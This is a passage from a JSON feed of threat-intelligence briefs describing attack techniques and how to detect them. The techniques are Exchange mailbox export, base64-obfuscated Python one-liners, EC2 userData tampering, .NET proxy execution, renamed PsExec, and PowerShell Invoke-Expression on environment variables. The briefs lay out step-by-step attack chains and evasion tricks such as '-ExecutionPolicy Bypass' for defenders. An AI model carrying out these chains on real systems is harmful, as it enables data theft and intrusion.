information. The \u003ccode\u003eNew-MailboxExportRequest\u003c/code\u003e cmdlet is used to export the contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. Attackers can abuse this functionality in preparation for exfiltrating contents, which are likely to contain sensitive and strategic data. This activity is typically performed using PowerShell or similar scripting tools and can be difficult to detect without specific monitoring in place. The activity may be part of a larger attack campaign targeting sensitive information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a compromised system with sufficient privileges to access Exchange PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the Exchange server using PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eNew-MailboxExportRequest\u003c/code\u003e cmdlet to initiate the export of a target mailbox to a .pst file. 
The command may include parameters to filter specific content.\u003c/li\u003e\n\u003cli\u003eThe Exchange server processes the export request, creating a .pst file containing the mailbox data.\u003c/li\u003e\n\u003cli\u003eThe attacker retrieves the exported .pst file from the designated file path.\u003c/li\u003e\n\u003cli\u003eThe attacker may compress and archive the .pst file to reduce its size for exfiltration.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the .pst file to an external location controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker analyzes the .pst file to extract sensitive information such as credentials, financial data, or intellectual property.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows the attacker to gain access to sensitive information contained within the exported mailboxes. This could lead to financial loss, reputational damage, or compromise of intellectual property. Depending on the scope of the export requests, multiple mailboxes may be compromised, impacting a large number of users. 
The impact is significant because email often contains highly sensitive business communications and data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to monitor PowerShell execution with command-line arguments (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect the use of \u003ccode\u003eNew-MailboxExportRequest\u003c/code\u003e cmdlet in PowerShell commands.\u003c/li\u003e\n\u003cli\u003eReview the privileges of users with the \u0026ldquo;Mailbox Import Export\u0026rdquo; privilege to ensure that the least privilege principle is being followed.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for PowerShell activity related to mailbox export requests (Data Source: Windows Security Event Logs).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to identify potential malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-exchange-mailbox-export/","summary":"Adversaries may use the New-MailboxExportRequest PowerShell cmdlet to export mailboxes in Exchange, potentially leading to sensitive information theft.","title":"Exchange Mailbox Export via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-exchange-mailbox-export/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["execution","defense-evasion","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers are increasingly leveraging Python one-liners with base64 encoding on Linux systems to deliver and execute malicious payloads. This technique allows for effective obfuscation, making it harder for conventional security solutions to detect the true nature of the executed commands. 
The use of \u003ccode\u003ebase64\u003c/code\u003e within Python scripts executed directly from the command line is a red flag, as it is rarely observed in standard administrative tasks but is frequently used to hide malicious intent. Defenders must prioritize detecting this behavior to uncover potentially compromised systems and prevent further escalation. This activity has been observed in conjunction with fake AI websites used to deliver malware.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Linux system through an undisclosed method (e.g., exploiting a vulnerability or social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or creates a script containing a base64-encoded payload.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python one-liner, invoking the \u003ccode\u003epython\u003c/code\u003e interpreter.\u003c/li\u003e\n\u003cli\u003eThe Python script imports the \u003ccode\u003ebase64\u003c/code\u003e module.\u003c/li\u003e\n\u003cli\u003eThe script decodes the base64-encoded payload using functions like \u003ccode\u003eb64decode\u003c/code\u003e, \u003ccode\u003eb32decode\u003c/code\u003e, or similar.\u003c/li\u003e\n\u003cli\u003eThe decoded payload is executed using \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eexec()\u003c/code\u003e within the same Python one-liner.\u003c/li\u003e\n\u003cli\u003eThe executed payload establishes persistence, downloads further malware, or performs lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a full system compromise, data exfiltration, or the deployment of persistent backdoors. 
The obfuscation techniques make detection difficult, potentially allowing attackers to operate undetected for extended periods. While the specific number of victims and targeted sectors remain unknown, the technique\u0026rsquo;s effectiveness in evading security measures makes it a high-priority threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Python Base64 One-Liners - Linux\u0026rdquo; to your SIEM to detect the execution of Python one-liners utilizing base64 decoding (logsource: process_creation/linux).\u003c/li\u003e\n\u003cli\u003eInvestigate any process creation events matching the Sigma rule, focusing on the parent processes and executed commands to identify the source of the malicious activity.\u003c/li\u003e\n\u003cli\u003eEnable and monitor process creation logs on Linux systems to ensure visibility of command-line execution, which is essential for detecting this type of attack (logsource: process_creation/linux).\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted scripts, mitigating the risk of malicious payload execution after decoding.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-python-base64-linux/","summary":"This brief focuses on detecting the execution of Python one-liners utilizing base64 decoding functions on Linux systems, a technique employed by malicious actors to obfuscate and execute payloads, thereby evading traditional security measures.","title":"Detection of Python Base64 Encoded Execution on 
Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-python-base64-linux/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["EC2"],"_cs_severities":["high"],"_cs_tags":["aws","ec2","user-data","privilege-escalation","persistence","execution"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eThis detection identifies a specific sequence of AWS EC2 API calls suggesting malicious intent. An adversary may update the \u003ccode\u003euserData\u003c/code\u003e attribute of an EC2 instance and then restart the instance to execute malicious scripts with elevated privileges (root on Linux, SYSTEM on Windows). The technique involves modifying instance attributes to inject malicious code or scripts, followed by stopping and starting the instance to trigger execution of the modified user data. This can lead to privilege escalation, persistence, or other malicious activities within the AWS environment. The detection focuses on the correlation of \u003ccode\u003eStopInstances\u003c/code\u003e, \u003ccode\u003eStartInstances\u003c/code\u003e, and \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e events that reference \u003ccode\u003euserData\u003c/code\u003e within a 5-minute window. The rule groups these events by instance ID, username, account ID, source IP, and user agent, triggering an alert only when all three distinct API calls are observed within the same group. 
This aims to reduce false positives by requiring the complete sequence of actions associated with this technique.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account with sufficient permissions to manage EC2 instances (e.g., via compromised credentials or an IAM role).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target EC2 instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e API call to update the \u003ccode\u003euserData\u003c/code\u003e attribute of the target instance, injecting malicious code or scripts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eStopInstances\u003c/code\u003e API call to stop the target EC2 instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eStartInstances\u003c/code\u003e API call to start the target EC2 instance.\u003c/li\u003e\n\u003cli\u003eUpon instance start, the modified \u003ccode\u003euserData\u003c/code\u003e script executes with elevated privileges, potentially installing malware, establishing persistence, or performing other malicious actions.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the compromised instance to further explore the AWS environment, escalate privileges, or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution within the AWS environment. Attackers can gain elevated privileges on the compromised EC2 instance, potentially leading to full control of the instance and the ability to access sensitive data or resources within the AWS account. This can result in data breaches, service disruptions, and financial losses. 
The modification of user data allows for persistent malicious code execution each time the instance restarts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the following Sigma rules to your SIEM to detect the described attack pattern, and tune them to your environment.\u003c/li\u003e\n\u003cli\u003eReview CloudTrail logs for \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e events with \u003ccode\u003euserData\u003c/code\u003e to identify potentially malicious modifications.\u003c/li\u003e\n\u003cli\u003eMonitor EC2 instance state transitions (stop/start) in conjunction with user data modifications.\u003c/li\u003e\n\u003cli\u003eImplement least privilege IAM policies to restrict access to EC2 management APIs.\u003c/li\u003e\n\u003cli\u003eUse AWS Secrets Manager or Parameter Store to manage secrets instead of embedding them in \u003ccode\u003euserData\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules and correlate them with other security events.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-aws-ec2-user-data-modification/","summary":"Detection of a sequence of AWS EC2 management API calls indicative of malicious modification of instance user data to execute arbitrary code upon instance restart, potentially leading to privilege escalation and persistence.","title":"AWS EC2 Stop, Start, and User Data Modification Correlation","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-user-data-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["proxy-execution","net-utility","defense-evasion","execution","signed-binary-proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis threat brief addresses the abuse of trusted 
Microsoft .NET binaries as proxies for malicious code execution. Attackers leverage script-based execution (e.g., PowerShell, VBScript, batch files) from atypical or user-writable directories to launch .NET utilities like aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, and vbc.exe. This method allows threat actors to bypass security controls and blend in with legitimate system activity. Observed activity occurs in environments where endpoint detection and response (EDR) agents are deployed. The lack of command-line variation between the utility\u0026rsquo;s image path and its executed process reinforces the suspicion of proxy execution. This technique has been associated with malware campaigns, including the deployment of VIP Keylogger.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (potentially through phishing or exploiting a software vulnerability, although this source does not specify the entry vector).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious script (e.g., a PowerShell script) into a user-writable directory such as C:\\Users\\Public\\ or C:\\Temp\\.\u003c/li\u003e\n\u003cli\u003eThe malicious script, often obfuscated to evade detection, executes from the non-standard location.\u003c/li\u003e\n\u003cli\u003eThe script then calls a legitimate .NET utility (e.g., InstallUtil.exe) to execute malicious code.\u003c/li\u003e\n\u003cli\u003eThe .NET utility executes with minimal command-line arguments, often just the executable path itself, to further blend in with legitimate activity.\u003c/li\u003e\n\u003cli\u003eThe .NET utility loads and executes attacker-controlled code, bypassing application control policies.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as keylogging (as seen with VIP Keylogger), credential theft, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves 
their objective, such as data exfiltration or establishing persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to bypass application control and execute arbitrary code, potentially leading to data theft, system compromise, and persistent access. While the number of victims and specific sectors are not detailed in this brief\u0026rsquo;s source, the use of VIP Keylogger as a payload demonstrates the potential for sensitive data exfiltration. Organizations lacking robust endpoint detection capabilities are at significant risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect .NET Utility Execution from Unusual Script Parents\u0026rdquo; to identify potential proxy execution attempts based on process relationships and file paths (rule provided below).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of .NET utilities (aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, vbc.exe) being launched from user-writable directories, especially when the parent process is a script interpreter (batch, CMD, PowerShell, JScript, VBScript, HTML).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events (Sysmon EventID 1 or Windows Event Log Security 4688) for unusual parent-child process relationships involving script interpreters and .NET utilities.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of .NET utilities from untrusted locations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-proxy-execution-net-utilities/","summary":"Detects the execution of .NET utilities by script processes from unusual locations, indicative of signed binary proxy execution for defense evasion and code execution.","title":"Windows Proxy 
Execution of .NET Utilities via Scripts","url":"https://feed.craftedsignal.io/briefs/2024-01-03-proxy-execution-net-utilities/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["psexec","lateral-movement","execution","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003ePsExec is a legitimate remote administration tool developed by Microsoft as part of the Sysinternals Suite, enabling the execution of commands with both regular and SYSTEM privileges on Windows systems. It functions by executing a service component, \u003ccode\u003ePsexecsvc.exe\u003c/code\u003e, on a remote system, which then runs a specified process and returns the results to the local system. While commonly used by administrators, adversaries frequently abuse PsExec for lateral movement and to execute commands as SYSTEM, effectively disabling defenses and bypassing security protections. This detection identifies instances where the PsExec service component is executed using a custom name, a tactic employed to evade security controls or detections targeting the default PsExec service component name. 
The rule was last updated on 2026-05-04 and covers Elastic Defend, Windows, M365 Defender, and Crowdstrike data sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network (e.g., via phishing or exploiting a public-facing application).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a renamed version of \u003ccode\u003epsexesvc.exe\u003c/code\u003e to a compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a tool like the standard \u003ccode\u003ePsExec.exe\u003c/code\u003e to initiate a remote connection to a target system.\u003c/li\u003e\n\u003cli\u003ePsExec attempts to copy the renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e to the ADMIN$ share on the target system.\u003c/li\u003e\n\u003cli\u003eThe renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e is executed as a service on the remote host.\u003c/li\u003e\n\u003cli\u003eThe renamed service executes commands specified by the attacker with SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eThe results of the commands are returned to the originating system.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the command execution for lateral movement, data exfiltration, or further compromise of the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to complete compromise of the target system and potentially the entire network. By executing commands with SYSTEM privileges, attackers can disable security controls, install malware, steal sensitive data, or move laterally to other critical systems. 
The use of a renamed PsExec executable demonstrates an attempt to evade detection, increasing the likelihood of a successful breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Process Execution via Renamed PsExec Executable\u0026rdquo; to your SIEM and tune for your environment to detect the execution of renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e executables.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the necessary process execution details for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule promptly, focusing on the commands executed and the target systems involved.\u003c/li\u003e\n\u003cli\u003eReview and enforce the principle of least privilege to minimize the potential impact of compromised accounts.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from unusual or untrusted systems, which could indicate PsExec usage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-renamed-psexec/","summary":"Detects suspicious PsExec activity where the PsExec service component is executed using a custom name, indicating an attempt to evade detections that look for the default PsExec service component name.","title":"Suspicious Process Execution via Renamed PsExec Executable","url":"https://feed.craftedsignal.io/briefs/2024-01-renamed-psexec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["execution","lateral-movement","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe detection rule identifies suspicious PowerShell activity related to scheduled tasks. 
Adversaries exploit Task Scheduler to execute malicious scripts, facilitating lateral movement or remote discovery. The rule monitors for the Task Scheduler DLL load within PowerShell processes (powershell.exe, pwsh.exe, powershell_ise.exe) followed by outbound RPC connections, signaling potential misuse. This activity may be indicative of attackers leveraging scheduled tasks for remote execution or reconnaissance within a compromised network. The detection logic focuses on the sequence of loading \u003ccode\u003etaskschd.dll\u003c/code\u003e and initiating an RPC connection to port 135, a common port for Distributed Component Object Model (DCOM) communication.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to interact with the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003ePowerShell process (powershell.exe, pwsh.exe, or powershell_ise.exe) loads the \u003ccode\u003etaskschd.dll\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a scheduled task using PowerShell commands.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003ePowerShell initiates an outbound RPC connection on port 135.\u003c/li\u003e\n\u003cli\u003eThe malicious payload executes, potentially leading to lateral movement or remote discovery.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining control of additional systems or gathering sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized remote code execution, lateral movement within the network, and the potential compromise of sensitive data. 
The creation or modification of scheduled tasks can provide persistence for attackers, allowing them to maintain access to compromised systems even after reboots. The impact includes potential data breaches, system compromise, and disruption of services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) and Event ID 3 (Network Connection) logging to detect the specific activity described in the attack chain.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Outbound Scheduled Task Activity via PowerShell\u0026rdquo; to your SIEM and tune the \u003ccode\u003emaxspan\u003c/code\u003e value based on your environment\u0026rsquo;s typical activity patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the specific PowerShell commands used and the scheduled tasks created or modified.\u003c/li\u003e\n\u003cli\u003eMonitor network connections to port 135 originating from PowerShell processes, and correlate with other security events to identify suspicious patterns.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls on the creation and modification of scheduled tasks, limiting access to authorized personnel only.\u003c/li\u003e\n\u003cli\u003eReview and clean up any unauthorized scheduled tasks on systems to prevent persistent malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-scheduled-task-powershell/","summary":"This rule detects PowerShell loading the Task Scheduler COM DLL followed by an outbound RPC network connection, potentially indicating lateral movement or remote discovery via scheduled tasks.","title":"Suspicious Outbound Scheduled Task Activity via 
PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-scheduled-task-powershell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["powershell","environment-variable","invoke-expression","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are increasingly leveraging PowerShell to execute malicious code embedded within environment variables. This method involves storing commands or encoded content in environment variables and then using \u003ccode\u003eInvoke-Expression\u003c/code\u003e (or its alias \u003ccode\u003eiex\u003c/code\u003e) to dynamically construct and execute code at runtime. This tactic is employed to evade traditional static analysis techniques and conceal the true intent of the executed code. Observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign, this technique is a significant threat. Defenders should be aware of this trend and implement appropriate detection mechanisms. The focus is on identifying PowerShell scripts that combine environment variable access (\u003ccode\u003e$env:\u003c/code\u003e) with \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its aliases, based on PowerShell Script Block Logging (Event ID 4104).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system, possibly through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003ePowerShell is invoked, either directly or indirectly, via a script or another process.\u003c/li\u003e\n\u003cli\u003eThe attacker sets an environment variable containing malicious code or a command. 
This might involve using \u003ccode\u003e[Environment]::SetEnvironmentVariable\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eA PowerShell script is executed that reads the content of the environment variable using \u003ccode\u003e$env:\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe content read from the environment variable is passed to \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its alias \u003ccode\u003eiex\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eInvoke-Expression\u003c/code\u003e dynamically executes the code, effectively bypassing static analysis.\u003c/li\u003e\n\u003cli\u003eThe executed code downloads and executes a secondary payload, such as a keylogger or a remote access tool.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as stealing credentials or establishing persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code on the compromised system, allowing attackers to install malware, steal sensitive data, or establish a persistent foothold. The VIP Keylogger campaign, for example, demonstrates how this technique can be used to harvest user credentials. Due to the obfuscated nature of this attack, it is difficult to detect and remediate, often leading to extended dwell time for the attacker. Compromised systems can be further used as a launchpad for attacks against other systems within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging (Event ID 4104) on all Windows systems to capture the de-obfuscated script blocks before execution.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM to detect PowerShell scripts that access environment variables and use \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its aliases. 
Tune these rules to your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules to determine if malicious activity is occurring.\u003c/li\u003e\n\u003cli\u003eMonitor PowerShell execution for suspicious environment variable access and dynamic code execution.\u003c/li\u003e\n\u003cli\u003eImplement application control to prevent the execution of unauthorized PowerShell scripts.\u003c/li\u003e\n\u003cli\u003eReview PowerShell execution policy settings, but do not treat them as a control: execution policy is not a security boundary and is bypassed trivially (for example with \u003ccode\u003e-ExecutionPolicy Bypass\u003c/code\u003e). Constrained Language Mode, enforced through application control such as AppLocker or WDAC, is what actually limits what dynamically evaluated script can do.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-powershell-env-var-execution/","summary":"Adversaries use PowerShell to execute malicious code stored in environment variables, leveraging Invoke-Expression or its aliases to bypass static analysis and execute payloads dynamically, as seen in malware loaders and stagers like the VIP Keylogger.","title":"PowerShell Execution via Environment Variables","url":"https://feed.craftedsignal.io/briefs/2024-01-powershell-env-var-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","persistence","privilege-escalation","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the creation of executable or script files in unusual directories on Windows systems. Adversaries often leverage these unconventional locations to evade standard security monitoring and establish persistence. 
The technique involves placing malicious files with extensions like \u003ccode\u003e.exe\u003c/code\u003e, \u003ccode\u003e.dll\u003c/code\u003e, \u003ccode\u003e.ps1\u003c/code\u003e, and others in directories such as \u003ccode\u003e\\windows\\fonts\\\u003c/code\u003e, \u003ccode\u003e\\users\\public\\\u003c/code\u003e, \u003ccode\u003e\\Windows\\debug\\\u003c/code\u003e, and others deemed atypical for such file types. This activity can bypass traditional signature-based detections and enable the execution of unauthorized code. The scope of this threat covers Windows systems where such file creation events are logged and monitored. This is important for defenders because successful exploitation leads to arbitrary code execution, persistence and further malicious activity within the compromised environment.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system, potentially through exploitation of a vulnerability or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to a suspicious directory, such as \u003ccode\u003eC:\\Windows\\Fonts\\\u003c/code\u003e or \u003ccode\u003eC:\\Users\\Public\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable file (e.g., \u003ccode\u003eevil.exe\u003c/code\u003e) or a script (e.g., \u003ccode\u003eevil.ps1\u003c/code\u003e) into the chosen directory.\u003c/li\u003e\n\u003cli\u003eThe attacker employs techniques to execute the malicious file, such as creating a scheduled task, modifying registry keys, or leveraging other \u0026ldquo;living off the land\u0026rdquo; binaries.\u003c/li\u003e\n\u003cli\u003eThe malicious file executes, performing actions such as establishing persistence, escalating privileges, or deploying additional malware.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the established persistence to maintain access to the compromised 
system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement to other systems within the network, utilizing tools such as PsExec or PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, system disruption, or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and complete system compromise. The creation of executables in suspicious paths is a common technique used by various threat actors. Multiple analytic stories are tagged, including PlugX, LockBit Ransomware, and Volt Typhoon. This technique is leveraged to evade detection and maintain a persistent presence on the compromised system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon EventID 11 logging to capture file creation events, which is the data source for the analytic.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the creation of executables or scripts in suspicious paths.\u003c/li\u003e\n\u003cli\u003eInvestigate and validate any alerts generated by the Sigma rule, focusing on the process and user context.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring (FIM) on critical directories to detect unauthorized file modifications.\u003c/li\u003e\n\u003cli\u003eReview and harden file system permissions to restrict write access to suspicious directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-executable-creation-suspicious-path/","summary":"This analytic identifies the creation of executables or scripts in suspicious file paths on Windows systems, where adversaries often use these paths to evade detection and maintain persistence, 
potentially leading to unauthorized code execution, privilege escalation, or persistence within the environment.","title":"Executable or Script Creation in Suspicious Paths","url":"https://feed.craftedsignal.io/briefs/2024-01-03-executable-creation-suspicious-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Windows","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows","scheduled-task"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies remote scheduled task creations on a target host, which can be indicative of lateral movement. Adversaries often leverage scheduled tasks to execute malicious commands, maintain persistence, or escalate privileges. This technique is particularly effective as it uses native Windows functionality, making it harder to distinguish from legitimate administrative actions. This rule is designed for data generated by Elastic Defend and also supports third-party data sources such as SentinelOne Cloud Funnel and Sysmon. Understanding when and how scheduled tasks are created remotely is crucial for detecting and 